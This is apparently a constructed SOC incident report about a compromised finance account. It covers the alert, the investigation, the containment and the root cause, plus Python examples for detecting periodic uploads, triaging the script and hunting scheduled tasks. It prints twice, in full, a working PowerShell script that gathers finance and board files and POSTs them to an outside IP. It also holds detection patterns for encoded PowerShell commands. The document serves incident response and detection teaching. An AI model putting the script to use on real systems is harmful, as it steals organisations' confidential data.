Varonis Alert Details
Alert ID: VARONIS-AUTO-EXFIL-1020-7842
Alert Time: 2024-03-03 09:30:15 EST
Severity: CRITICAL (95/100)
Source: Varonis Data Security Platform
Rule: "Automated Data Collection Script Detected – Potential Mass Exfiltration"
MITRE ATT&CK: T1020 – Automated Exfiltration
Alert Details:
Detection: PowerShell script automatically collecting and exfiltrating data at regular intervals
User: kwilson@company.com (Karen Wilson, Finance Manager)
Host: FIN-WS-112
Time: 09:15-09:30 EST
Script Details:
Path: C:\Users\kwilson\AppData\Local\Temp\backup.ps1
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Scheduled Task: “FinanceBackup” (created 09:00)
Trigger: Every 30 minutes
Script Content:
    while($true) {
        $targets = @(
            "\\filesrv\finance\reports\*.xlsx",
            "\\filesrv\finance\budgets\*.xlsx",
            "\\filesrv\executive\board\*.docx",
            "C:\Users\kwilson\Documents\*.xlsx",
            "C:\Users\kwilson\Desktop\*.docx"
        )
        $zipFile = "C:\temp\data_$(Get-Date -Format 'yyyyMMddHHmm').zip"
        $tempDir = "C:\temp\collect"
        New-Item -ItemType Directory -Path $tempDir -Force
        foreach ($target in $targets) {
            Copy-Item -Path $target -Destination $tempDir -Recurse -ErrorAction SilentlyContinue
        }
        Compress-Archive -Path $tempDir\* -DestinationPath $zipFile -Force
        Remove-Item -Path $tempDir -Recurse -Force
        # Exfiltrate
        $bytes = [System.IO.File]::ReadAllBytes($zipFile)
        $b64 = [System.Convert]::ToBase64String($bytes)
        $body = @{data=$b64} | ConvertTo-Json
        Invoke-WebRequest -Uri http://185.143.221[.]89/upload -Method POST -Body $body
        Remove-Item $zipFile
        Start-Sleep -Seconds 1800
    }
Automated Exfiltration Log:
09:00 – Script started (scheduled task)
09:01 – First collection: 234 files (45 MB)
09:02 – Exfiltration of 45 MB to 185.143.221[.]89
09:30 – Second collection in progress (detected)
Detection Logic:
Script runs automatically every 30 minutes
Collects data from multiple sensitive locations
Exfiltrates immediately after collection
Pattern matches automated, continuous exfiltration
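Network-side detection of the same pattern, as an added example (not Varonis' rule, which works from file-access telemetry): a host sending POSTs to one external destination on a near-constant interval, with real volume behind them, is a scheduled job rather than a person. The log format, the thresholds and every line of the sample are assumptions constructed for this example; the FIN-WS-112 rows mirror the incident's 30-minute cadence, the rest are benign noise, including a low-volume heartbeat that is periodic but should not trip an exfiltration rule.

```python
"""Detect automated, periodic outbound transfers (ATT&CK T1020) in egress logs.

Added example for this write-up; not Varonis' detection logic. Lines are
constructed: "<ISO time> <host> <dst_ip> <method> <path> <bytes_out>". Benign
destinations use RFC 5737 documentation ranges.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

SAMPLE_EGRESS_LOG = """\
2024-03-03T09:00:00 FIN-WS-114 198.51.100.5 POST /telemetry 512
2024-03-03T09:00:00 SALES-WS-03 203.0.113.10 POST /api/sync 900000
2024-03-03T09:02:10 FIN-WS-112 185.143.221.89 POST /upload 47185920
2024-03-03T09:05:00 FIN-WS-114 198.51.100.5 POST /telemetry 512
2024-03-03T09:05:44 FIN-WS-112 192.0.2.14 GET /office/update 1024
2024-03-03T09:07:00 SALES-WS-03 203.0.113.10 POST /api/sync 700000
2024-03-03T09:10:00 FIN-WS-114 198.51.100.5 POST /telemetry 512
2024-03-03T09:10:00 HR-WS-007 185.143.221.89 POST /upload 20480
2024-03-03T09:15:00 FIN-WS-114 198.51.100.5 POST /telemetry 512
2024-03-03T09:32:09 FIN-WS-112 185.143.221.89 POST /upload 3145728
2024-03-03T09:50:00 SALES-WS-03 203.0.113.10 POST /api/sync 800000
2024-03-03T10:02:11 FIN-WS-112 185.143.221.89 POST /upload 2097152
2024-03-03T10:32:10 FIN-WS-112 185.143.221.89 POST /upload 4194304
"""


def parse_line(line: str):
    ts, host, dst, method, path, nbytes = line.split()
    return datetime.fromisoformat(ts), host, dst, method, path, int(nbytes)


def find_periodic_uploads(log_text: str, min_events: int = 3,
                          max_jitter: float = 0.10, min_total_bytes: int = 1_000_000):
    """Return (host, dst) pairs whose POSTs recur on a stable interval and move volume.

    jitter = stddev(gaps) / mean(gaps): a scheduled task gives ~0, a human gives >0.3.
    min_total_bytes separates data exfiltration from small C2 heartbeats, which need
    their own lower-volume rule (assumed thresholds, tune to the egress baseline).
    """
    uploads = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, dst, method, _path, nbytes = parse_line(line)
        if method == "POST":
            uploads[(host, dst)].append((ts, nbytes))

    findings = []
    for (host, dst), events in sorted(uploads.items()):
        if len(events) < min_events:
            continue
        events.sort()
        gaps = [(b - a).total_seconds() for (a, _), (b, _) in zip(events, events[1:])]
        avg = mean(gaps)
        jitter = pstdev(gaps) / avg if avg else float("inf")
        total = sum(n for _, n in events)
        if jitter <= max_jitter and total >= min_total_bytes:
            findings.append({
                "host": host, "dst": dst, "events": len(events),
                "interval_s": round(avg), "jitter": round(jitter, 3), "bytes_out": total,
            })
    return findings


if __name__ == "__main__":
    for f in find_periodic_uploads(SAMPLE_EGRESS_LOG):
        print(f)
```

With the defaults only FIN-WS-112 to 185.143.221.89 is reported: SALES-WS-03 posts more than 1 MB but at irregular times, and FIN-WS-114 is perfectly periodic but moves 2 KB in total. Dropping min_total_bytes to zero turns the detector into a generic beacon finder and surfaces the heartbeat as well.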
SOC Investigation Process
Step | Action | Tools Used | Findings
---- | ------ | ---------- | --------
1. Alert Validation | Verify Varonis alert | Varonis Console | Confirmed automated exfiltration script
2. Process Investigation | Identify scheduled task | CrowdStrike Falcon | "FinanceBackup" task running PowerShell script
3. User Interview | Contact kwilson | Teams, Phone | User did NOT create script (account compromised)
4. Immediate Action | Isolate host | CrowdStrike | FIN-WS-112 quarantined
5. C2 Blocking | Block destination IP | Palo Alto | 185.143.221[.]89 blocked
6. Account Remediation | Disable kwilson account | Azure AD, AD | Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-161
Summary: T1020 – Automated Exfiltration of 45 MB Every 30 Minutes
Status: RESOLVED
Resolution: MALICIOUS – Automated Exfiltration Stopped
Priority: P1 – CRITICAL
Labels: T1020, automated-exfiltration, powershell, varonis, compromised-account
Components: Data-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Varonis Data Security Platform.
Alert: “Automated Data Collection Script Detected – Potential Mass Exfiltration”.
User: kwilson@company.com (Finance Manager).
Host: FIN-WS-112.
Script: backup.ps1 running every 30 minutes.
Data: 45 MB exfiltrated in first run.
Time: 2024-03-03 09:30 EST.
Technique: MITRE ATT&CK T1020 – Automated Exfiltration.
2. Technical Analysis:
Attack Chain:
08:30 – kwilson account compromised via phishing
08:45 – Attacker logs into FIN-WS-112 via RDP
08:50 – Attacker creates backup.ps1 script
09:00 – Attacker creates scheduled task “FinanceBackup”
09:01 – First automated run (45 MB exfiltrated)
09:30 – Second run begins; Varonis detects
Script Analysis:
Collection: Files from finance shares, executive shares, local folders
Frequency: Every 30 minutes, enforced twice over: the "FinanceBackup" task trigger fires every 30 minutes and the script itself loops forever with Start-Sleep -Seconds 1800, so newly created files are swept up continuously
Exfiltration: HTTP POST of the base64-encoded ZIP in a JSON body to http://185.143.221[.]89/upload, in cleartext over port 80
Persistence: Scheduled task "FinanceBackup", running in kwilson's user context with exactly the share access Karen Wilson already has
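Static triage of the recovered script, as an added example rather than anything Varonis or CrowdStrike produced: pull the collection targets, staging paths, destination, cadence and behaviours an analyst needs for scoping and blocking out of the script text. The script constant is the one recorded in the alert, with the destination kept defanged as in this report; the regular expressions are assumptions tuned to PowerShell scripts of this shape (quoted path literals, an @( ) target array, Start-Sleep -Seconds).

```python
"""Static triage of a recovered PowerShell collection/exfiltration script.

Added example for this write-up, not tool output. It extracts what the analyst
needs for scoping (which shares were collected), blocking (which host receives
the data) and timeline work (how often it runs). The script below is the one
recorded in the alert, destination kept defanged ([.]) as in the report.
"""
import re
from typing import Optional
from urllib.parse import urlparse

RECOVERED_SCRIPT = r'''
while($true) {
    $targets = @(
        "\\filesrv\finance\reports\*.xlsx",
        "\\filesrv\finance\budgets\*.xlsx",
        "\\filesrv\executive\board\*.docx",
        "C:\Users\kwilson\Documents\*.xlsx",
        "C:\Users\kwilson\Desktop\*.docx"
    )
    $zipFile = "C:\temp\data_$(Get-Date -Format 'yyyyMMddHHmm').zip"
    $tempDir = "C:\temp\collect"
    New-Item -ItemType Directory -Path $tempDir -Force
    foreach ($target in $targets) {
        Copy-Item -Path $target -Destination $tempDir -Recurse -ErrorAction SilentlyContinue
    }
    Compress-Archive -Path $tempDir\* -DestinationPath $zipFile -Force
    Remove-Item -Path $tempDir -Recurse -Force
    $bytes = [System.IO.File]::ReadAllBytes($zipFile)
    $b64 = [System.Convert]::ToBase64String($bytes)
    $body = @{data=$b64} | ConvertTo-Json
    Invoke-WebRequest -Uri http://185.143.221[.]89/upload -Method POST -Body $body
    Remove-Item $zipFile
    Start-Sleep -Seconds 1800
}
'''

# Quoted UNC (\\server\share\...) or drive-letter (C:\...) path literals.
PATH_RE = re.compile(r'"((?:\\\\|[A-Za-z]:\\)[^"]+)"')
# Bodies of @( ... ) array literals: where a collector enumerates its targets.
ARRAY_RE = re.compile(r'@\(([^()]*)\)')
URL_RE = re.compile(r'https?://[^\s"\')]+')
# Only the -Seconds form is handled; -Milliseconds and the -s alias would need adding.
SLEEP_RE = re.compile(r'Start-Sleep\s+-Seconds\s+(\d+)', re.I)
LOOP_RE = re.compile(r'while\s*\(\s*\$true\s*\)', re.I)


def refang(indicator: str) -> str:
    """Turn the report's defanged form (185.143.221[.]89) back into a routable value."""
    return indicator.replace("[.]", ".")


def share_root(path: str) -> Optional[str]:
    r"""\\server\share\dir\*.xlsx -> \\server\share, the unit data owners are notified by."""
    m = re.match(r'(\\\\[^\\]+\\[^\\]+)', path)
    return m.group(1) if m else None


def triage_script(script: str) -> dict:
    targets = []
    for array_body in ARRAY_RE.findall(script):
        targets.extend(PATH_RE.findall(array_body))
    # Path literals outside the target array are local staging (ZIP, collect dir).
    staging = [p for p in PATH_RE.findall(script) if p not in targets]
    urls = URL_RE.findall(script)
    sleep = SLEEP_RE.search(script)
    return {
        "targets": targets,
        "share_roots": {r for r in map(share_root, targets) if r},
        "staging": staging,
        "destinations": urls,                       # as written (defanged) for the report
        "block_hosts": sorted({urlparse(refang(u)).hostname for u in urls}),  # for the firewall
        "interval_seconds": int(sleep.group(1)) if sleep else None,
        "infinite_loop": LOOP_RE.search(script) is not None,
        "base64_encoding": "ToBase64String" in script,
        "cleans_up": "Remove-Item" in script,
    }


if __name__ == "__main__":
    for key, value in triage_script(RECOVERED_SCRIPT).items():
        print(f"{key:17} {value}")
```

The share_roots set (\\filesrv\finance and \\filesrv\executive) is what drives the data-owner notification, block_hosts is the refanged value to hand to the firewall team, and interval_seconds plus infinite_loop together explain why the script keeps running between task triggers.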
Data Exfiltrated (First Run – 45 MB):
Finance reports (23 files) – 18 MB
Budget spreadsheets (12 files) – 15 MB
Executive board documents (5 files) – 8 MB
Personal finance documents (user’s) – 4 MB
Attacker Intent:
Establish persistent, automated exfiltration
Continuously steal new data as it’s created
Blend in by sending frequent, moderately sized HTTP POSTs instead of one bulk transfer
3. Investigation Findings:
Timeline:
08:30 – Account compromised
08:45 – Attacker logs in
08:50-09:00 – Script and task created
09:01 – First exfiltration (45 MB)
09:30 – Second run starts
09:30 – Varonis alert
09:32 – SOC investigates
09:33 – Host isolated
09:34 – Script and task removed
Indicators of Compromise (IoCs):
Files:
– C:\Users\kwilson\AppData\Local\Temp\backup.ps1 (SHA256: a1b2c3d4…)
Scheduled Task:
– “FinanceBackup” (every 30 minutes)
Network:
– Destination: 185.143.221[.]89:80
– Pattern: POST /upload every 30 minutes
Account:
– kwilson (compromised)
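Fleet hunt for the persistence mechanism behind these IoCs, as an added example (not a CrowdStrike or Varonis query): flag every scheduled task that runs PowerShell from a Temp directory, passes an encoded command, or was created by an ordinary user on a short repeat interval, plus exact matches on the FinanceBackup name and backup.ps1 path. The export is constructed in the column layout of schtasks /query /fo CSV /v, trimmed to the columns the hunt uses, with a second host's output appended so the header line repeats as it does when per-host exports are concatenated; every host, user and command other than the FIN-WS-112 task is constructed.

```python
"""Hunt a scheduled-task inventory for the persistence pattern used in this incident.

Added example for this write-up. Input follows `schtasks /query /fo CSV /v`, reduced
to the columns used here. All rows are constructed; FIN-WS-112 reproduces the
incident's task, FIN-WS-118 is a constructed look-alike (its -enc blob decodes to
the UTF-16LE string "Invoke" and nothing more).
"""
import csv
import io
import re

TASK_EXPORT = r'''"HostName","TaskName","Author","Task To Run","Run As User","Schedule Type","Repeat: Every"
"FIN-WS-112","\FinanceBackup","COMPANY\kwilson","powershell.exe -ExecutionPolicy Bypass -File C:\Users\kwilson\AppData\Local\Temp\backup.ps1","COMPANY\kwilson","One Time Only, Minute","0 Hour(s), 30 Minute(s)"
"FIN-WS-112","\Microsoft\Windows\Defrag\ScheduledDefrag","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$","SYSTEM","Weekly","Disabled"
"HostName","TaskName","Author","Task To Run","Run As User","Schedule Type","Repeat: Every"
"FIN-WS-118","\Updater","COMPANY\mchen","powershell.exe -w hidden -enc SQBuAHYAbwBrAGUA","COMPANY\mchen","Daily","0 Hour(s), 15 Minute(s)"
"HR-WS-007","\OneDrive Reporting Task","Microsoft Corporation","%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe /reporting","COMPANY\jdoe","Daily","Disabled"
'''

PS_RE = re.compile(r'\b(?:powershell|pwsh)(?:\.exe)?\b', re.I)
TEMP_RE = re.compile(r'\\Temp\\', re.I)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand, down to -e.
_ENC_PREFIXES = ["encodedcommand"[:i] for i in range(len("encodedcommand"), 0, -1)]
ENC_RE = re.compile(r'(?:^|\s)-(?:' + "|".join(_ENC_PREFIXES) + r')(?:\s|$)', re.I)
REPEAT_RE = re.compile(r'(\d+) Hour\(s\), (\d+) Minute\(s\)')

# Exact IoCs from this incident; extend from the IoC list as the case grows.
KNOWN_TASKS = {"financebackup"}
KNOWN_SCRIPTS = {"backup.ps1"}


def repeat_minutes(value):
    """'0 Hour(s), 30 Minute(s)' -> 30; 'Disabled' or missing -> None."""
    m = REPEAT_RE.search(value or "")
    return int(m.group(1)) * 60 + int(m.group(2)) if m else None


def assess_task(row: dict, max_repeat_min: int = 60) -> list:
    """Return the list of reasons a task row is suspicious (empty when it is not)."""
    reasons = []
    name = row["TaskName"].lstrip("\\").lower()
    cmd = row["Task To Run"]
    if name in KNOWN_TASKS or any(s in cmd.lower() for s in KNOWN_SCRIPTS):
        reasons.append("known-ioc")
    if PS_RE.search(cmd):
        if TEMP_RE.search(cmd):
            reasons.append("temp-script")
        if ENC_RE.search(cmd):
            reasons.append("encoded-command")
    every = repeat_minutes(row.get("Repeat: Every"))
    # A task authored by the same non-Microsoft user it runs as, repeating at most
    # hourly, is the shape of user-context persistence (assumed heuristic).
    user_authored = (row["Author"] != "Microsoft Corporation"
                     and row["Author"] == row["Run As User"])
    if user_authored and every is not None and 0 < every <= max_repeat_min:
        reasons.append("frequent-repeat")
    return reasons


def hunt_scheduled_tasks(export_csv: str) -> list:
    findings = []
    for row in csv.DictReader(io.StringIO(export_csv)):
        if row["HostName"] == "HostName":   # repeated header from a concatenated export
            continue
        reasons = assess_task(row)
        if reasons:
            findings.append({"host": row["HostName"], "task": row["TaskName"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in hunt_scheduled_tasks(TASK_EXPORT):
        print(f)
```

The encoded-command check is built from every prefix of -EncodedCommand because powershell.exe accepts all of them, so a rule that only matches the full parameter name misses the common -enc and -e forms; the -ExecutionPolicy on the FIN-WS-112 task is not mistaken for one because the match requires whitespace after the prefix.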
4. Containment Actions:
Immediate Actions:
Isolated FIN-WS-112 via CrowdStrike.
Disabled scheduled task.
Deleted backup.ps1.
Blocked destination IP at firewall.
Disabled kwilson account.
Reset password.
Data Protection:
Determined scope of exfiltrated data (45 MB in first run).
Notified affected data owners.
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to automated exfiltration setup.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Script execution allowed (no application control).
6. Business Impact:
Operational Impact: Finance host offline; user offline.
Data Exposure: 45 MB of financial and executive data exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Automated exfiltration stopped.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented application control.
Enhanced Varonis monitoring for automated collection patterns.
8. Conclusion:
An attacker compromised a finance manager’s account and set up an automated exfiltration script that ran every 30 minutes, stealing 45 MB of data in its first run. Varonis detected the automated pattern and enabled rapid containment before the second run could complete.
Closure Rationale: Automated exfiltration stopped; data exfiltrated (45 MB); account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-03 10:30 EST